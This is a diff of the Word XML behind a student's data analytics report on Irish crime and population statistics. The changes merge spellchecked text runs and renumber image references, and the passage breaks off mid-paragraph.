-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>To get the exact values, we can also explore the pmi itself</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>, here are a way to explore the pmi.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8961,7 +9108,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9024,7 +9171,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>The most common crime type is 67 "Theft and related offences", with a probability over 0.14.</w:t>
       </w:r>
     </w:p>
@@ -9046,6 +9192,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>The least common crime type is 34, "Infanticide", with probability of 2.08e-07 or 0.000000208</w:t>
       </w:r>
     </w:p>
@@ -9167,7 +9314,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9290,9 +9437,8 @@
           <w:lang w:val="fr-FR"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">3.0 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">3.0 Sample Report </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
@@ -9300,29 +9446,6 @@
           <w:bCs w:val="0"/>
           <w:color w:val="000000"/>
           <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>Sample</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Report </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
         </w:rPr>
         <w:t>– Methodologies</w:t>
       </w:r>
@@ -9364,29 +9487,7 @@
           <w:u w:color="000000"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">3.1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>Sample</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Report </w:t>
+        <w:t xml:space="preserve">3.1 Sample Report </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9707,31 +9808,7 @@
           <w:u w:color="000000"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">3.5 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>Sample</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Report </w:t>
+        <w:t xml:space="preserve">3.5 Sample Report </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10844,7 +10921,6 @@
         </w:rPr>
         <w:t xml:space="preserve">This process will be performed on </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -10853,7 +10929,6 @@
         </w:rPr>
         <w:t>Jupyter</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11203,151 +11278,110 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> The first goal is using Data Visualization, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> The first goal is using Data Visualization, analize the population growth in each region and in total</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>analize</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t xml:space="preserve"> 1996.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> the population growth in each region and in total</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 1996.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:t>As we have 2 datasets with these datas</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>:</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">As we have 2 datasets with these </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>datas</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>PEA07-Estimated_Pupulation-1996-2017.csv</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>:</w:t>
+        <w:t xml:space="preserve"> and </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>PEA04-Estimated_Pupulation-2011-2023.csv</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>PEA07-Estimated_Pupulation-1996-2017.csv</w:t>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> and </w:t>
+        <w:t xml:space="preserve"> We need to </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>PEA04-Estimated_Pupulation-2011-2023.csv</w:t>
-      </w:r>
-      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>visualize,  clean, verify if is there any “bad data” (null or bad formatted data), and after merge these datasets.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> We need to </w:t>
+        <w:t xml:space="preserve">Analysing the dataset, we can see that the population is split into regions, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>visualize,  clean, verify if is there any “bad data” (null or bad formatted data), and after merge these datasets.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Analysing the dataset, we can see that the population is split into regions, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">each region represents a group of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>conties</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>, as follows:</w:t>
+        <w:t>each region represents a group of conties, as follows:</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -12139,7 +12173,6 @@
                 <w:lang w:eastAsia="en-IE"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
@@ -12148,31 +12181,8 @@
                 <w:szCs w:val="16"/>
                 <w:lang w:eastAsia="en-IE"/>
               </w:rPr>
-              <w:t>Dún</w:t>
+              <w:t>Dún Laoghaire-Rathdown</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-                <w:lang w:eastAsia="en-IE"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Laoghaire-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-                <w:lang w:eastAsia="en-IE"/>
-              </w:rPr>
-              <w:t>Rathdown</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -13592,7 +13602,7 @@
     <w:p/>
     <w:p/>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId17"/>
+      <w:footerReference w:type="default" r:id="rId19"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
       <w:pgBorders w:offsetFrom="page">

--- a/MSC_DA_CA1_Jose_Mario.docx
+++ b/MSC_DA_CA1_Jose_Mario.docx
@@ -295,37 +295,12 @@
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:i/>
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
-              <w:t>Bharathi</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>Chakravarthi</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>/</w:t>
+              <w:t>Bharathi Chakravarthi/</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -338,17 +313,8 @@
                 <w:i/>
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
-              <w:t xml:space="preserve">Marina </w:t>
+              <w:t>Marina Iantorno</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>Iantorno</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -3259,7 +3225,6 @@
                 <w:lang w:eastAsia="en-IE"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3268,31 +3233,8 @@
                 <w:szCs w:val="16"/>
                 <w:lang w:eastAsia="en-IE"/>
               </w:rPr>
-              <w:t>Dún</w:t>
+              <w:t>Dún Laoghaire-Rathdown</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-                <w:lang w:eastAsia="en-IE"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Laoghaire-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-                <w:lang w:eastAsia="en-IE"/>
-              </w:rPr>
-              <w:t>Rathdown</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -5217,25 +5159,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Data Wrangling is the first step to be performed with the data. This process consists of cleaning, transforming, and manipulating the data to make it more usable for analysis. This process will be performed in a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Jupyter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Notebook:</w:t>
+        <w:t>Data Wrangling is the first step to be performed with the data. This process consists of cleaning, transforming, and manipulating the data to make it more usable for analysis. This process will be performed in a Jupyter Notebook:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5443,7 +5367,6 @@
         </w:rPr>
         <w:t>“</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5452,7 +5375,6 @@
         </w:rPr>
         <w:t>crime_df</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5469,7 +5391,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5500,16 +5421,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>rame</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, one</w:t>
+        <w:t>rame, one</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5519,7 +5431,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> ‘</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5528,7 +5439,6 @@
         </w:rPr>
         <w:t>NaN</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5578,53 +5488,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>method .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>dropna</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">() has been used in this </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>dataframe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>The method .dropna() has been used in this dataframe.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5730,7 +5594,6 @@
         </w:rPr>
         <w:t xml:space="preserve">EDA allows us to gain an overall understanding of the </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
@@ -5753,14 +5616,7 @@
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>rames</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>, detect relationships between variables, and examine the distribution of the variables of interest. In this study, the exploratory data analysis (EDA) step will be used to perform both statistical analysis and visualization tasks.</w:t>
+        <w:t>rames, detect relationships between variables, and examine the distribution of the variables of interest. In this study, the exploratory data analysis (EDA) step will be used to perform both statistical analysis and visualization tasks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5916,7 +5772,7 @@
                 <v:stroke joinstyle="miter"/>
                 <v:path gradientshapeok="t" o:connecttype="rect"/>
               </v:shapetype>
-              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:314.9pt;margin-top:44.55pt;width:170.6pt;height:103.1pt;z-index:251664384;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:314.9pt;margin-top:44.55pt;width:170.6pt;height:103.1pt;z-index:251664384;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -6177,14 +6033,12 @@
         </w:rPr>
         <w:t xml:space="preserve">, the </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
         <w:t>population_df</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
@@ -6195,21 +6049,7 @@
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">  and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>crime_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">  and crime_df </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6290,25 +6130,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">This process will be performed on </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Jupyter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> notebook:</w:t>
+        <w:t>This process will be performed on Jupyter notebook:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6328,9 +6150,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>MSC_DA_CA1_Jose_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>MSC_DA_CA1_Jose_Mario</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6339,7 +6160,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Mario</w:t>
+        <w:t>.ipynb</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6349,7 +6170,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>.ipynb</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6364,30 +6185,71 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>and it was called</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> it was called</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>hase 0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - EDA </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
